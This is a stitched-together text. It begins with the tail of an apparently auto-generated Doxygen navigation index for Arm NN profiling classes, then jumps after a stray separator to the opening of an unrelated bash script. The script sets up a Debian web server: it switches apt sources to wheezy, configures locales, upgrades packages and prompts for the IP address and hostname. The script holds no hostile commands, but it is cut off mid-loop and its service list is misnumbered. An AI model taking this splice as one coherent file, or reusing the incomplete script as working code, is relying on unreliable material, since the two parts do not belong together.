"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a38edfdaaf346b8b2ad60ba9ab591fdff":[7,0,0,2,12,18],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a4626db62503c13042a745a40399f8317":[7,0,0,2,12,5],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a59397e9294a483953bdf682f16a8a3cd":[7,0,0,2,12,19],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a63fc4d050f681a84653c1d861e989f45":[7,0,0,2,12,15],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a6d7f92b987338cab6cbfbad8d53a9738":[7,0,0,2,12,8],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a6ec101239653ba9260e1362c5381e81d":[7,0,0,2,12,25],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a74ff6a2d9003a0713863df27450f42ed":[7,0,0,2,12,17],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#a82cdaf1dbfea445bda6018760140ab50":[7,0,0,2,12,20],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#aa71d36872f416feaa853788a7a7a7ef8":[7,0,0,2,12,2],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#aa898e858d26d200fbc3788ac6d14fd90":[7,0,0,2,12,12],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#aab31f60f412b119002a465e13d5165f0":[7,0,0,2,12,4],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#ab9756dfaf9b36cc51262369a27d1384f":[7,0,0,2,12,23],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#abd87d40b4a54b7e1625cb765768553b9":[7,0,0,2,12,16],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#ac9bdbed464222fa06875096a4f373ca8":[7,0,0,2,12,14],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#acf7538e5b98c77d22e3df30360a071a2":[7,0,0,2,12,1],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#ad368fc6d788ff64cc25cafe2b40265c6":[7,0,0,2,12,9],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#ad742b37bc2beb568e083225f3fd8160b":[7,0,0,2,12,13],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#ad9062caad1836f8e6b810e4e97bb19d1":[7,0,0,2,12,7],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#ae1e135cd44b3b612ded4decaed61ae1b":[7,0,0,2,12,21],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#ae3b7dbaa7317dacbcec25f30f6a16075":[7,0,0,2,12,10],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#aefdd6df4feb698935d16311be966fda5":[7,0,0,2,12,6],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#af55b37f13ace15889ce8a0b18dda3ed9":[7,0,0,2,12,3],
"classarmnn_1_1profiling_1_1_counter_directory.xhtml#afcb72c4151fd72abfffcb7dae0ed2817":[7,0,0,2,12,11],
"classarmnn_1_1profiling_1_1_counter_id_map.xhtml":[7,0,0,2,14],
"classarmnn_1_1profiling_1_1_counter_id_map.xhtml#a332eb20cab18c17fb869168dc493514e":[7,0,0,2,14,2],
"classarmnn_1_1profiling_1_1_counter_id_map.xhtml#a40f23e39c9e564d9276caa8d8331aa47":[7,0,0,2,14,3],
"classarmnn_1_1profiling_1_1_counter_id_map.xhtml#a4c014af62ced747fc2ebbbc312f9845f":[7,0,0,2,14,4],
"classarmnn_1_1profiling_1_1_counter_id_map.xhtml#ad019be329c6a01c1d3fb93239f2ecded":[7,0,0,2,14,0],
"classarmnn_1_1profiling_1_1_counter_id_map.xhtml#ad7cf6a514144f22d94542b8d7b833640":[7,0,0,2,14,1],
"classarmnn_1_1profiling_1_1_counter_id_map.xhtml#af82f4acaed7bb39d568e689a9caa63d5":[7,0,0,2,14,5],
"classarmnn_1_1profiling_1_1_counter_set.xhtml":[7,0,0,2,15],
"classarmnn_1_1profiling_1_1_counter_set.xhtml#a58ce26007b307f7e6200e4af7fbf601d":[7,0,0,2,15,3],
"classarmnn_1_1profiling_1_1_counter_set.xhtml#a946b6d2db711c642a3d5c9272269956d":[7,0,0,2,15,0],
"classarmnn_1_1profiling_1_1_counter_set.xhtml#ab13844df5477a9ab8f13069e3d8abad6":[7,0,0,2,15,2],
"classarmnn_1_1profiling_1_1_counter_set.xhtml#ab4676c63d2f2d14922a8f7cc768d1618":[7,0,0,2,15,1],
"classarmnn_1_1profiling_1_1_device.xhtml":[7,0,0,2,18],
"classarmnn_1_1profiling_1_1_device.xhtml#a28e8394686112e495caf069eb46b44ca":[7,0,0,2,18,1],
"classarmnn_1_1profiling_1_1_device.xhtml#a58ce26007b307f7e6200e4af7fbf601d":[7,0,0,2,18,3],
"classarmnn_1_1profiling_1_1_device.xhtml#a8e96a434397eee3db8703fb58a477b8f":[7,0,0,2,18,0],
"classarmnn_1_1profiling_1_1_device.xhtml#ab13844df5477a9ab8f13069e3d8abad6":[7,0,0,2,18,2],
"classarmnn_1_1profiling_1_1_directory_capture_command_handler.xhtml":[7,0,0,2,19],
"classarmnn_1_1profiling_1_1_directory_capture_command_handler.xhtml#a41a25ce1deeb5ac0ddbaa99bba961dc6":[7,0,0,2,19,4],
"classarmnn_1_1profiling_1_1_directory_capture_command_handler.xhtml#a439df5e87f9c6e2bb674d0ddf9ccc07e":[7,0,0,2,19,0],
"classarmnn_1_1profiling_1_1_directory_capture_command_handler.xhtml#a7877b37f88f6d9d8743b492a2970c837":[7,0,0,2,19,3],
"classarmnn_1_1profiling_1_1_directory_capture_command_handler.xhtml#a7ea1ce1121a51bbea9ea973c3a1463bb":[7,0,0,2,19,2],
"classarmnn_1_1profiling_1_1_directory_capture_command_handler.xhtml#adfaa32654e05eab63b2adc34b2138475":[7,0,0,2,19,1],
"classarmnn_1_1profiling_1_1_file_only_profiling_connection.xhtml":[7,0,0,2,20],
"classarmnn_1_1profiling_1_1_file_only_profiling_connection.xhtml#a0f9aecd570c4e5e6d41337f0e2f1adf5":[7,0,0,2,20,2],
"classarmnn_1_1profiling_1_1_file_only_profiling_connection.xhtml#a1adbda8257d3a74a0566e0d8407ff458":[7,0,0,2,20,4],
"classarmnn_1_1profiling_1_1_file_only_profiling_connection.xhtml#a42eb542b5a1d73d00c4ce474140bb78c":[7,0,0,2,20,5],
"classarmnn_1_1profiling_1_1_file_only_profiling_connection.xhtml#a5cd8e59fba0c1b4f5e9b09de59a75951":[7,0,0,2,20,0],
"classarmnn_1_1profiling_1_1_file_only_profiling_connection.xhtml#a91bdc9d5497d47f5d707418beb83b140":[7,0,0,2,20,3],
"classarmnn_1_1profiling_1_1_file_only_profiling_connection.xhtml#af05e56dee203f12a40d407ef64023467":[7,0,0,2,20,1],
"classarmnn_1_1profiling_1_1_holder.xhtml":[7,0,0,2,21],
"classarmnn_1_1profiling_1_1_holder.xhtml#a95c8634416821480a8140c87054718f6":[7,0,0,2,21,1],
"classarmnn_1_1profiling_1_1_holder.xhtml#aa0e031cc1a69643fc80783201454b428":[7,0,0,2,21,0],
"classarmnn_1_1profiling_1_1_holder.xhtml#ae904af7c6336ceeeb95ab8435047c7cb":[7,0,0,2,21,2],
"classarmnn_1_1profiling_1_1_i_backend_profiling.xhtml":[7,0,0,2,22],
"classarmnn_1_1profiling_1_1_i_backend_profiling.xhtml#a1179976118abc3d6765a5b2fea4be35c":[7,0,0,2,22,0],
"classarmnn_1_1profiling_1_1_i_backend_profiling.xhtml#a33b3b8d541860022fe9edecfee7284d6":[7,0,0,2,22,1],
"classarmnn_1_1profiling_1_1_i_backend_profiling.xhtml#a3af5b700b06e401119749bd3a80bacf0":[7,0,0,2,22,2],
"classarmnn_1_1profiling_1_1_i_backend_profiling.xhtml#a691685749cd1a917b8e6e9cb1afcc045":[7,0,0,2,22,7],
"classarmnn_1_1profiling_1_1_i_backend_profiling.xhtml#a93ee1c2509b9db845936a291b575dd17":[7,0,0,2,22,6],
"classarmnn_1_1profiling_1_1_i_backend_profiling.xhtml#a9b9e803df01765cbfe9c9148fe757db5":[7,0,0,2,22,4],
"classarmnn_1_1profiling_1_1_i_backend_profiling.xhtml#ab159fe93b4a4357f55b55920e03b9af6":[7,0,0,2,22,3],
"classarmnn_1_1profiling_1_1_i_backend_profiling.xhtml#af3bab90857bb0cd2363f654cdd257e34":[7,0,0,2,22,5],
"classarmnn_1_1profiling_1_1_i_backend_profiling_context.xhtml":[7,0,0,2,23],
"classarmnn_1_1profiling_1_1_i_backend_profiling_context.xhtml#a5a1d4c34ead611b06c3eae53f2ff47e8":[7,0,0,2,23,4],
"classarmnn_1_1profiling_1_1_i_backend_profiling_context.xhtml#a73cd771233a88545d3623f35c1fad4d4":[7,0,0,2,23,1],
"classarmnn_1_1profiling_1_1_i_backend_profiling_context.xhtml#a7877cff32ce673cece82591034759a62":[7,0,0,2,23,3],
"classarmnn_1_1profiling_1_1_i_backend_profiling_context.xhtml#a9aeb82fc99434b8847b6274868cce79e":[7,0,0,2,23,0],
"classarmnn_1_1profiling_1_1_i_backend_profiling_context.xhtml#af34a12973d15f31aaec7cf6fee34ffa3":[7,0,0,2,23,2],
"classarmnn_1_1profiling_1_1_i_buffer_manager.xhtml":[7,0,0,2,24],
"classarmnn_1_1profiling_1_1_i_buffer_manager.xhtml#a033cae4e6d00fc1958f79f09216a3437":[7,0,0,2,24,4],
"classarmnn_1_1profiling_1_1_i_buffer_manager.xhtml#a18c16b4ff70efb2663a4c4c1144babee":[7,0,0,2,24,0],
"classarmnn_1_1profiling_1_1_i_buffer_manager.xhtml#a2d5f60e55b59ae8667ff593b5bfc5deb":[7,0,0,2,24,7],
"classarmnn_1_1profiling_1_1_i_buffer_manager.xhtml#a3712fbb9506d016ac2ed7d56b8788a16":[7,0,0,2,24,5],
"classarmnn_1_1profiling_1_1_i_buffer_manager.xhtml#a49c88b0e052621f30462c3bdbf3e4a7a":[7,0,0,2,24,6],
"classarmnn_1_1profiling_1_1_i_buffer_manager.xhtml#abb12c72b032fda64ab5a596f5e49fc56":[7,0,0,2,24,2],
"classarmnn_1_1profiling_1_1_i_buffer_manager.xhtml#acc2e97eddda6324261ba202634cc8ef8":[7,0,0,2,24,3],
"classarmnn_1_1profiling_1_1_i_buffer_manager.xhtml#ad0faa8a317506b2e72252f087c7f3c46":[7,0,0,2,24,1],
"classarmnn_1_1profiling_1_1_i_consumer.xhtml":[7,0,0,2,25],
"classarmnn_1_1profiling_1_1_i_consumer.xhtml#a4b4fe1cfea0198d9defd88178f073365":[7,0,0,2,25,1],
"classarmnn_1_1profiling_1_1_i_consumer.xhtml#a70e3766f4088883274c4daa1941f03b9":[7,0,0,2,25,0],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml":[7,0,0,2,26],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#a228989d3c53e86e779567ca5c2033ec2":[7,0,0,2,26,10],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#a67693dcf840ffeadc066ce77ef7b2044":[7,0,0,2,26,7],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#a718a75d4c178cf3f687b3f27b8f55091":[7,0,0,2,26,1],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#a81881e3910b23455b46ec30c8420c695":[7,0,0,2,26,4],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#a8908490db3b8a0003a639ac56b956cee":[7,0,0,2,26,9],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#a90890aee41059d8fed244538acc4044f":[7,0,0,2,26,2],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#a98e6769cb933d30bfd3ca25f61bd8438":[7,0,0,2,26,12],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#ab43b0472c37fe51694977ae9b4132404":[7,0,0,2,26,3],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#acab78d0987a9cca5a9cac957be610a7d":[7,0,0,2,26,5],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#ad5186479ccb3343cad2dcf8a288bede1":[7,0,0,2,26,0],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#ad9fa9b8364fcaa2c940ef8e78eff8df2":[7,0,0,2,26,6],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#aecd5912045fd41fe41dc96c9844f6deb":[7,0,0,2,26,11],
"classarmnn_1_1profiling_1_1_i_counter_directory.xhtml#aef59fdca57a5bb822e22cacfc5836fab":[7,0,0,2,26,8],
"classarmnn_1_1profiling_1_1_i_counter_mappings.xhtml":[7,0,0,2,27],
"classarmnn_1_1profiling_1_1_i_counter_mappings.xhtml#a83e6db8d13e21158334ca6722b20fa67":[7,0,0,2,27,2],
"classarmnn_1_1profiling_1_1_i_counter_mappings.xhtml#a8c03a58ac20b34e541bad78df16859e8":[7,0,0,2,27,1],
"classarmnn_1_1profiling_1_1_i_counter_mappings.xhtml#aff478703ba6af2360a04c1f0e00911b4":[7,0,0,2,27,0],
"classarmnn_1_1profiling_1_1_i_counter_registry.xhtml":[7,0,0,2,28],
"classarmnn_1_1profiling_1_1_i_counter_registry.xhtml#a0338e5b744c9c2d08143cf70d319940f":[7,0,0,2,28,3],
"classarmnn_1_1profiling_1_1_i_counter_registry.xhtml#a1d4c2bc2310f063afdf3691f3228012f":[7,0,0,2,28,2],
"classarmnn_1_1profiling_1_1_i_counter_registry.xhtml#a552c43eab6a2ba99f68f98802631db8e":[7,0,0,2,28,4],
"classarmnn_1_1profiling_1_1_i_counter_registry.xhtml#ae975a04ac3e352f5ed0c13501a684cb5":[7,0,0,2,28,0],
"classarmnn_1_1profiling_1_1_i_counter_registry.xhtml#aefa3b1cd8c21711b682a9291c0203a8f":[7,0,0,2,28,1],
"classarmnn_1_1profiling_1_1_i_packet_buffer.xhtml":[7,0,0,2,29],
"classarmnn_1_1profiling_1_1_i_packet_buffer.xhtml#a0dd0b11d60c79e8c89ed1b851a45030d":[7,0,0,2,29,2],
"classarmnn_1_1profiling_1_1_i_packet_buffer.xhtml#a4586c90cbeb7804b32dad8c1bd6ae242":[7,0,0,2,29,1],
"classarmnn_1_1profiling_1_1_i_packet_buffer.xhtml#a4dc7ecb0d192d6cccc9287daaf0eca0f":[7,0,0,2,29,3],
"classarmnn_1_1profiling_1_1_i_packet_buffer.xhtml#a9ded593bdc39f70c3e135e649ab3e42e":[7,0,0,2,29,0],
"classarmnn_1_1profiling_1_1_i_periodic_counter_capture.xhtml":[7,0,0,2,30],
"classarmnn_1_1profiling_1_1_i_periodic_counter_capture.xhtml#a1d4f3d9132cded687954cab389a6d608":[7,0,0,2,30,0],
"classarmnn_1_1profiling_1_1_i_periodic_counter_capture.xhtml#a4d7bebcc22c1b09cf961b83bf84033b6":[7,0,0,2,30,2],
"classarmnn_1_1profiling_1_1_i_periodic_counter_capture.xhtml#a63ce9b9c6710c0dae98f88d6c602313a":[7,0,0,2,30,1],
"classarmnn_1_1profiling_1_1_i_profiling_connection.xhtml":[7,0,0,2,31],
"classarmnn_1_1profiling_1_1_i_profiling_connection.xhtml#a8a3511046982c64efa3e3833d749e5ef":[7,0,0,2,31,2],
"classarmnn_1_1profiling_1_1_i_profiling_connection.xhtml#a8c5a75b8ee005a7aa9391f3991480d74":[7,0,0,2,31,0],
"classarmnn_1_1profiling_1_1_i_profiling_connection.xhtml#a935e16d85893a31f23cd78e47b85466d":[7,0,0,2,31,3],
"classarmnn_1_1profiling_1_1_i_profiling_connection.xhtml#aacb6d0e5e6d570cdc2b0da14c3921ff0":[7,0,0,2,31,1],
"classarmnn_1_1profiling_1_1_i_profiling_connection.xhtml#ac78c6bd1a545934a805c88194214b09d":[7,0,0,2,31,4],
"classarmnn_1_1profiling_1_1_i_profiling_connection_factory.xhtml":[7,0,0,2,32],
"classarmnn_1_1profiling_1_1_i_profiling_connection_factory.xhtml#a0edc1350a5dcc81620a1f28e2a1051f2":[7,0,0,2,32,2],
"classarmnn_1_1profiling_1_1_i_profiling_connection_factory.xhtml#a18f247c2a53095da228e441270536b03":[7,0,0,2,32,3],
"classarmnn_1_1profiling_1_1_i_profiling_connection_factory.xhtml#a1e3ab71aae7621abd6c1a16cc71b68e0":[7,0,0,2,32,0],
"classarmnn_1_1profiling_1_1_i_profiling_connection_factory.xhtml#abb7f442bd7409c8dff2b9346fd67bce3":[7,0,0,2,32,1],
"classarmnn_1_1profiling_1_1_i_profiling_guid_generator.xhtml":[7,0,0,2,33],
"classarmnn_1_1profiling_1_1_i_profiling_guid_generator.xhtml#a46e22ba5f91b48d2b5165648787b9ace":[7,0,0,2,33,2],
"classarmnn_1_1profiling_1_1_i_profiling_guid_generator.xhtml#a9aff9f95b721c2dd1d229b9816261f1b":[7,0,0,2,33,1],
"classarmnn_1_1profiling_1_1_i_profiling_guid_generator.xhtml#ad19d8099ddbd9db86a34bdc756d110a8":[7,0,0,2,33,0],
"classarmnn_1_1profiling_1_1_i_profiling_service.xhtml":[7,0,0,2,34],
"classarmnn_1_1profiling_1_1_i_profiling_service.xhtml#a1d441898feff66d8ac30fa1724386869":[7,0,0,2,34,0],
"classarmnn_1_1profiling_1_1_i_profiling_service.xhtml#a33877b12b685ae752dc1227fe14d9441":[7,0,0,2,34,4],
"classarmnn_1_1profiling_1_1_i_profiling_service.xhtml#a743ad7374bfc124be30eebeb93206acd":[7,0,0,2,34,2],
"classarmnn_1_1profiling_1_1_i_profiling_service.xhtml#a93ee1c2509b9db845936a291b575dd17":[7,0,0,2,34,5],
"classarmnn_1_1profiling_1_1_i_profiling_service.xhtml#ac4e831d7fe03198d15e7212c7d40c96c":[7,0,0,2,34,1],
"classarmnn_1_1profiling_1_1_i_profiling_service.xhtml#af39c79e2dbf841cf43cfcf1e5f2a30cb":[7,0,0,2,34,3],
"classarmnn_1_1profiling_1_1_i_read_counter_values.xhtml":[7,0,0,2,35],
"classarmnn_1_1profiling_1_1_i_read_counter_values.xhtml#a0ac59f90f7593e43d1d7939d2ca11a4c":[7,0,0,2,35,0],
"classarmnn_1_1profiling_1_1_i_read_counter_values.xhtml#a0e2c96a05cefc72d60f5a35692a4a928":[7,0,0,2,35,3],
"classarmnn_1_1profiling_1_1_i_read_counter_values.xhtml#acab78d0987a9cca5a9cac957be610a7d":[7,0,0,2,35,1],
"classarmnn_1_1profiling_1_1_i_read_counter_values.xhtml#af0092bd7f4da4a071b29bc04aec883cd":[7,0,0,2,35,2],
"classarmnn_1_1profiling_1_1_i_read_only_packet_buffer.xhtml":[7,0,0,2,36],
"classarmnn_1_1profiling_1_1_i_read_only_packet_buffer.xhtml#a040a515076ec53aa5e3a933d7c7ce43c":[7,0,0,2,36,0],
"classarmnn_1_1profiling_1_1_i_read_only_packet_buffer.xhtml#a43a27876dafdccf067777f84a97e6664":[7,0,0,2,36,1],
"classarmnn_1_1profiling_1_1_i_read_only_packet_buffer.xhtml#a60eae84cd5c7f05de36f64c1fdc0001c":[7,0,0,2,36,2],
"classarmnn_1_1profiling_1_1_i_read_only_packet_buffer.xhtml#adf275dd5054ae4d71e736ba427e1d200":[7,0,0,2,36,3],
"classarmnn_1_1profiling_1_1_i_read_write_counter_values.xhtml":[7,0,0,2,37],
"classarmnn_1_1profiling_1_1_i_read_write_counter_values.xhtml#a793b09867c400487ca81505aa8ebd6cc":[7,0,0,2,37,0],
"classarmnn_1_1profiling_1_1_i_register_backend_counters.xhtml":[7,0,0,2,38],
"classarmnn_1_1profiling_1_1_i_register_backend_counters.xhtml#a1df38f206d3d114ab5c98624a74595e7":[7,0,0,2,38,0],
"classarmnn_1_1profiling_1_1_i_register_backend_counters.xhtml#a1e48221e1b2a005b133f0043c8ed7190":[7,0,0,2,38,4],
"classarmnn_1_1profiling_1_1_i_register_backend_counters.xhtml#a745a18d2d50f88ae616af5e3fe67892f":[7,0,0,2,38,1],
"classarmnn_1_1profiling_1_1_i_register_backend_counters.xhtml#a9bd077ffa9adfaedd89b83505a1da115":[7,0,0,2,38,2],
"classarmnn_1_1profiling_1_1_i_register_backend_counters.xhtml#a9c9fb969e907ab6e67d5b605ff019489":[7,0,0,2,38,3],
"classarmnn_1_1profiling_1_1_i_register_counter_mapping.xhtml":[7,0,0,2,39],
"classarmnn_1_1profiling_1_1_i_register_counter_mapping.xhtml#a43a787400d2a563b9eee1a149225c18a":[7,0,0,2,39,2],
"classarmnn_1_1profiling_1_1_i_register_counter_mapping.xhtml#a9cd06e75fb10218f2decbd4117af4a8e":[7,0,0,2,39,0],
"classarmnn_1_1profiling_1_1_i_register_counter_mapping.xhtml#ae8ae959752e05d110a66f590dfb18faa":[7,0,0,2,39,1],
"classarmnn_1_1profiling_1_1_i_send_counter_packet.xhtml":[7,0,0,2,40],
"classarmnn_1_1profiling_1_1_i_send_counter_packet.xhtml#a14e9efe48e3d4ed05396f8a856bfaeea":[7,0,0,2,40,5],
"classarmnn_1_1profiling_1_1_i_send_counter_packet.xhtml#a583357d6511e6cb6084829e4f7cd1315":[7,0,0,2,40,1],
"classarmnn_1_1profiling_1_1_i_send_counter_packet.xhtml#a6435f063192414c6dc68ef2f31628a5c":[7,0,0,2,40,4],
"classarmnn_1_1profiling_1_1_i_send_counter_packet.xhtml#a80cb41c63cb6d3a19870b3a0a8f21ba7":[7,0,0,2,40,0],
"classarmnn_1_1profiling_1_1_i_send_counter_packet.xhtml#ae3331355e62b6008340c27e82be9a851":[7,0,0,2,40,2],
"classarmnn_1_1profiling_1_1_i_send_counter_packet.xhtml#aeacf0722dbf513d511b46a9bf43bfa4a":[7,0,0,2,40,3],
"classarmnn_1_1profiling_1_1_i_send_thread.xhtml":[7,0,0,2,41],
"classarmnn_1_1profiling_1_1_i_send_thread.xhtml#a4e0fb8f587a0f5ef84d28e57cd2b6afe":[7,0,0,2,41,0],
"classarmnn_1_1profiling_1_1_i_send_thread.xhtml#a7c6c2c7d1aeec305dcae4bc901b0bdca":[7,0,0,2,41,2],
"classarmnn_1_1profiling_1_1_i_send_thread.xhtml#ae9429e2efd9a811c148c6b56b635567c":[7,0,0,2,41,1],
"classarmnn_1_1profiling_1_1_i_send_timeline_packet.xhtml":[7,0,0,2,42],
"classarmnn_1_1profiling_1_1_i_send_timeline_packet.xhtml#a0426a9f8bc2789012477f08c3e03a532":[7,0,0,2,42,5],
"classarmnn_1_1profiling_1_1_i_send_timeline_packet.xhtml#a4025973da19ce55930abfd8b6df4edbe":[7,0,0,2,42,6],
"classarmnn_1_1profiling_1_1_i_send_timeline_packet.xhtml#a86e61b430276d7fe2861e2b3ac30221c":[7,0,0,2,42,0],
"classarmnn_1_1profiling_1_1_i_send_timeline_packet.xhtml#ae487fd34b2cf1fd88381da8fcb8c0984":[7,0,0,2,42,4],
"classarmnn_1_1profiling_1_1_i_send_timeline_packet.xhtml#af7eb3c2db53d7cba441b9a8d3a7bede9":[7,0,0,2,42,2],
"classarmnn_1_1profiling_1_1_i_send_timeline_packet.xhtml#af989a156fe1339215ecb6667fce1b9de":[7,0,0,2,42,3],
"classarmnn_1_1profiling_1_1_i_send_timeline_packet.xhtml#afa8522a76e7102e41d7c73a34fe493d4":[7,0,0,2,42,1],
"classarmnn_1_1profiling_1_1_i_send_timeline_packet.xhtml#affa63e0fcb0702b52815e840d7813803":[7,0,0,2,42,7],
"classarmnn_1_1profiling_1_1_i_write_counter_values.xhtml":[7,0,0,2,43],
"classarmnn_1_1profiling_1_1_i_write_counter_values.xhtml#a1a7730e559150a572dc27b05c96d98b9":[7,0,0,2,43,4],
"classarmnn_1_1profiling_1_1_i_write_counter_values.xhtml#a4ba4a09617cccdeabacf0efafcc8f4b9":[7,0,0,2,43,3],
"classarmnn_1_1profiling_1_1_i_write_counter_values.xhtml#a4bea6d881d0a2c0ebf8779bce4050352":[7,0,0,2,43,1],
"classarmnn_1_1profiling_1_1_i_write_counter_values.xhtml#a78f2b663eb502e4849edfb4bdfda71bb":[7,0,0,2,43,2],
"classarmnn_1_1profiling_1_1_i_write_counter_values.xhtml#ae66105a7872a56f4f98e700d673bfd8b":[7,0,0,2,43,0],
"classarmnn_1_1profiling_1_1_labels_and_event_classes.xhtml":[7,0,0,2,44],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml":[7,0,0,2,46],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml#a183eaa37ccd326bd82179bed901c7122":[7,0,0,2,46,2],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml#a226108649851aa1b1a8168560c5228b5":[7,0,0,2,46,6],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml#abce8709dc1b666a26f427ba7ff08b737":[7,0,0,2,46,4],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml#ac29af30972ae62351f87a669e2c8940f":[7,0,0,2,46,0],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml#ac3f43b4dd3fafd6b13342acc2263bbb4":[7,0,0,2,46,7],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml#ad675ff4e9053375bd41d0aad6b3bbb63":[7,0,0,2,46,8],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml#ae717263b3243e9f88f4caea6d31b0652":[7,0,0,2,46,5],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml#ae8b885e4225f3b0976f22ae8bc94f52a":[7,0,0,2,46,1],
"classarmnn_1_1profiling_1_1_mock_buffer_manager.xhtml#af22fdc7450c285c4d7449425c8fe994f":[7,0,0,2,46,3],
"classarmnn_1_1profiling_1_1_mock_counter_directory.xhtml":[7,0,0,2,47],
"classarmnn_1_1profiling_1_1_mock_counter_directory.xhtml#a130d8f6cbda6d299aeb355d4abcc5f95":[7,0,0,2,47,15],
"classarmnn_1_1profiling_1_1_mock_counter_directory.xhtml#a180f0ad0d134cd8ea5eb89c663ae00b0":[7,0,0,2,47,1]
};
|
#!/bin/bash
VERSION="0.1"
AUTHOR="Matteo Mattei <info@matteomattei.com>"
is_installed()
{
dpkg -l "${1}" > /dev/null 2>&1
return ${?}
}
pretty_echo()
{
echo -e "\e[1;32m${1}\e[0m"
}
select_yes()
{
MESSAGE="${1}"
while true; do
pretty_echo "\n${MESSAGE} [Y|n]"
read RES
case "${RES}" in
y|Y|yes|Yes|YES|"")
return 0
;;
n|N|no|NO)
return 1
;;
*)
pretty_echo "I don't understand..."
;;
esac
done
}
##############################
###### MAIN STARTS HERE ######
##############################
# Make sure to be root
if [ ! $(id -u) -eq 0 ]; then pretty_echo "You have to execute this program with root credentials"; exit 1; fi
# PRINT STARTUP MESSAGE
COPYRIGHT_DATE=$(date +%Y)
[ ${COPYRIGHT_DATE} -gt 2014 ] && COPYRIGHT_DATE="2014-${COPYRIGHT_DATE}"
pretty_echo "
DebianServerSetup v.${VERSION} - copyright ${COPYRIGHT_DATE} ${AUTHOR}
This program will updated the whole system and install a set of common services
needed for a production Web Server based on Debian based distribution.
This is the list of the services supported:
1) MySQL (database server)
2) NGINX (reverse proxy web server)
3) APACHE (web server)
3) PHP (web backend)
4) EXIM (MTA mail server)
5) SHOREWALL (firewall)
During the installation you will be prompted to insert the following information:
HOSTNAME: hostname of the server (\"web1\" for example)
FQDN: a Fully Qualified Domain Name (\"web1.mydomain.com\" for example)
IP_ADDRESS: a public IP address
MYSQL ROOT PASSWORD: only if you decide to install MySQL
-----------------------------------------------------------------------------------------"
if ! select_yes "Do you want to proceed?"; then exit 0; fi
# SETUP APT SOURCE
# This is just for clean-up in case some server has an old repository configured
sed -i "/non\-us\.debian\.org/d" /etc/apt/sources.list
# Make sure to use wheezy repository
sed -i "{s#squeeze.*#wheezy/updates main contrib non-free#g}" /etc/apt/sources.list
# SETTING UP LOCALES
# This is needed in case the server does not have any locale already configured
if [ -z "${LC_ALL}" ] || [ -z "${LANGUAGE}" ] || [ -z "${LANG}" ]
then
export LC_ALL="en_US.UTF-8"
export LANGUAGE="en_US.UTF-8"
export LANG="en_US.UTF-8"
sed -i "{s/^# en_US\.UTF\-8 UTF\-8/en_US.UTF-8 UTF-8/g}" /etc/locale.gen
update-locale LC_ALL=en_US.UTF-8
update-locale LANGUAGE=en_US.UTF-8
update-locale LANG=en_US.UTF-8
locale-gen en_US.UTF-8
. /etc/default/locale
fi
# UPDATE THE WHOLE SYSTEM
export DEBIAN_FRONTEND=noninteractive
apt-get update
apt-get -y upgrade
apt-get -y dist-upgrade
# INSTALL USEFUL TOOLS
apt-get -y install vim git pwgen
# SETUP IP ADDRESS AND HOSTNAME
IP_ADDRESS=$(ifconfig | grep "inet addr:" | grep -v "127\.0\.0\.1" | awk '{print $2}' | awk -F':' '{print $2}')
if [ -n "${IP_ADDRESS}" ]
then
if ! select_yes "Do you want to use the IP address ${IP_ADDRESS}?"
then
while true
do
pretty_echo "Plesae provide your IP address"
read IP_ADDRESS
if [ -n "${IP_ADDRESS}" ]
then
if echo "${IP_ADDRESS}" | grep -Eq "^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$"
then
break
else
pretty_echo "Unknown IP address"
fi
fi
done
fi
else
while true
do
pretty_echo "Plesae provide your IP address"
read IP_ADDRESS
if [ -n "${IP_ADDRESS}" ]
then
if echo "${IP_ADDRESS}" | grep -Eq "^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$"
then
break
else
pretty_echo "Unknown IP address"
fi
fi
done
fi
# Now that we have the IP address we setup /etc/hosts
while true
do
pretty_echo "Current hostname: $(hostname)"
pretty_echo "Current FQDN: $(hostname -f)"
if select_yes "Do you want to change them?"
then
while true
do
pretty_echo "Please provide a new hostname (something like 'web1')"
read HOSTNAME_NAME
if [ -n "${HOSTNAME_NAME}" ]
then
echo "${HOSTNAME_NAME}" > /etc/hostname
break
fi
